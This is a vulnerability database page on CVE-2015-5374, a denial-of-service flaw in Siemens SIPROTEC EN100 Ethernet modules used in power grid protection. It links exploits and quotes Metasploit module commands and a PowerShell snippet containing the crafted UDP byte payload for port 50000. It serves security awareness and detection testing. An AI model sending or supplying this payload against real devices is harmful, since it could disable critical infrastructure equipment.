Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
7.8
CVSSv2

CVE-2015-5374

Published: 18/07/2015 Updated: 23/03/2018
CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10
VMScore: 826
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C
Subscribe to Siemens

Vulnerability Summary

A vulnerability has been identified in Firmware variant PROFINET IO for EN100 Ethernet module : All versions < V1.04.01; Firmware variant Modbus TCP for EN100 Ethernet module : All versions < V1.11.00; Firmware variant DNP3 TCP for EN100 Ethernet module : All versions < V1.03; Firmware variant IEC 104 for EN100 Ethernet module : All versions < V1.21; EN100 Ethernet module included in SIPROTEC Merging Unit 6MU80 : All versions < 1.02.02. Specially crafted packets sent to port 50000/UDP could cause a denial-of-service of the affected device. A manual reboot may be required to recover the service of the device.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

siemens siprotec_firmware 4.24

Exploits

Exploit DB: Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < 4.25 - Denial of Service
# Exploit Title: Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module &lt; V425 - Denial of Service # Date: 14022018 # Exploit Author: M Can Kurnaz # Contact: twittercom/0x43414e # Vendor Homepage: wwwsiemenscom # Version: All devices that include the EN100 Ethernet module version V424 or prior # Tested on: Siemens ...
Exploit DB: Siemens SIPROTEC 4 / Compact EN100 Ethernet Module Denial Of Service
Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module versions prior to 425 suffers from a denial of service vulnerability ...
Exploit DB: Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service
This module sends a specially crafted packet to port 50000/UDP causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact &lt; V425) devices A manual reboot is required to return the device to service CVE-2015-5374 and a CVSS v2 base score of 78 have been assigned to this vulnerab ...

Metasploit Modules

Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service

This module sends a specially crafted packet to port 50000/UDP causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices. A manual reboot is required to return the device to service. CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.

msf > use auxiliary/dos/scada/siemens_siprotec4
msf auxiliary(siemens_siprotec4) > show actions
    ...actions...
msf auxiliary(siemens_siprotec4) > set ACTION < action-name >
msf auxiliary(siemens_siprotec4) > show options
    ...show and set options...
msf auxiliary(siemens_siprotec4) > run

Github Repositories

https://github.com/can/CVE-2015-5374-DoS-PoC

CVE-2015-5374 Denial of Service PoC

CVE-2015-5374 Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module &lt; V425 - Denial of Service This code sends a specially crafted packet to Port 50000/UDP could cause a denial of service of the affected device A manual reboot is required to return the device to service CVE-2015-5374 and a CVSS v2 base score of 78 have been assigned to this vulnerability can

https://github.com/g4xyk00/IDPS

Intrusion Detection and Prevention System

To test Intrusion Detection/Prevention functionality CVE-2015-5374 Siemens SIPROTEC Denial-of-Service Vulnerability [SystemByte[]] $ByteArray=0x11,0x49,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x28,0x9e $UdpClient = New-Object SystemNetSocketsUdpClient $UdpClientConnect("19216812756", 50000) $UdpClientSend($ByteArray, $ByteArray

Recent Articles

Move over, Stuxnet: Industroyer malware linked to Kiev blackouts
The Register • John Leyden • 12 Jun 2017

Modular nasty can seize direct control of substation switches and circuit breakers

Security researchers have discovered malware capable of disrupting industrial control processes. Industroyer can cause the same sort of damage as BlackEnergy, a malware strain blamed for attacks on energy firms that caused blackouts in Ukraine in December 2015. The malware may have featured in follow-up attacks last December and can significantly harm electric power systems. It could be refitted to target other types of critical infrastructure, according to security firm ESET. Industroyer is mod...

Read more...

References

CWE-19http://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_security_advisory_ssa-732541.pdfhttp://www.securityfocus.com/bid/75948https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01https://www.siemens.com/cert/pool/cert/siemens_security_advisory_SSA-323211.pdfhttps://ics-cert.us-cert.gov/advisories/ICSA-17-187-03https://www.exploit-db.com/exploits/44103/https://nvd.nist.govhttps://github.com/can/CVE-2015-5374-DoS-PoChttps://www.exploit-db.com/exploits/44103/
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2022-48654CVE-2024-2757authentication bypassCVE-2024-3194CVE-2024-33640CVE-2024-21111dosinsecure direct object referenceCVE-2024-21345
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook